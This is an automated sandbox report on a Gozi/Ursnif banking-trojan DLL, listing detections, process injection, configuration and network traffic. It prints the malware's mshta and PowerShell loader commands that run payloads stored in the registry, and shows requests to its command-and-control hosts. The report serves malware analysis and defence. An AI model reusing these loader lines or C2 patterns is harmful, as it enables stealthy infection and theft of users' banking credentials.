Loading ...

Play interactive tourEdit tour

Analysis Report onerous.tar.dll

Overview

General Information

Sample Name:onerous.tar.dll
Analysis ID:322295
MD5:79d81979dbbd1c8ceb04cc80a903ecd1
SHA1:f40959018e132fb1430f77a26903af222244676c
SHA256:5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
Tags:dll

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6780 cmdline: loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll' MD5: 76E2251D0E9772B9DA90208AD741A205)
    • control.exe (PID: 4672 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 7128 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4876 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3732 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5816 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5556 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4908 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5016 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3360 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 12 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', ProcessId: 4908
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5556
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', ProcessId: 4908

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: onerous.tar.dllAvira: detected
            Found malware configurationShow sources
            Source: loaddll32.exe.6780.0.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: onerous.tar.dllVirustotal: Detection: 47%Perma Link
            Source: onerous.tar.dllReversingLabs: Detection: 58%
            Machine Learning detection for sampleShow sources
            Source: onerous.tar.dllJoe Sandbox ML: detected
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Found Tor onion addressShow sources
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Nov 2020 20:19:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000021.00000000.419863199.000000000F589000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/ap=j%E/
            Source: ~DFCE3757A75A0E50D1.TMP.3.dr, {C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/S
            Source: {E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.drString found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2B
            Source: {DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.drString found in binary or memory: http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM
            Source: {DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr, ~DFAC17D42899691A13.TMP.20.drString found in binary or memory: http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4Dr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
